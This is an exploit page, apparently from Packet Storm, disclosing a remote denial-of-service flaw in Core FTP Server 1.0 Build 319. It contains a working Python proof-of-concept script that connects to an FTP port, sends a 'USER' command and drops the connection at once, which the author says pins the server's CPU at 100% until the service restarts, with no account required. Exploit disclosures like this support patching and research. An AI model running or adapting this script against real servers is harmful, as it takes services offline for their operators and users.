Core FTP Server version 1.0 Build 319 suffers from a remote denial of service vulnerability.
49933519fe2c4b693e105a1f04a807e3dcc61d13f727d9c57e57409cae6b7bd3
view source
print?
# Note: FTP account is not required for exploitation
# http://www.mertsarica.com
# I discovered a denial-of-service vulnerability on Core FTP Server product.
# When you send "USER test\r\n" and then kills the connection
# immediately, cpu increases to 100% and stays at that level until you
# stop the ftp service.
import socket, sys
HOST = 'localhost'
PORT = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
except:
print "Connection error"
sys.exit(1)
try:
s.send('USER MS\r\n') # magic packet
s.close()
print("Very good, young padawan, but you still have much to learn...")
except:
print "Connection error"
sys.exit(1)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed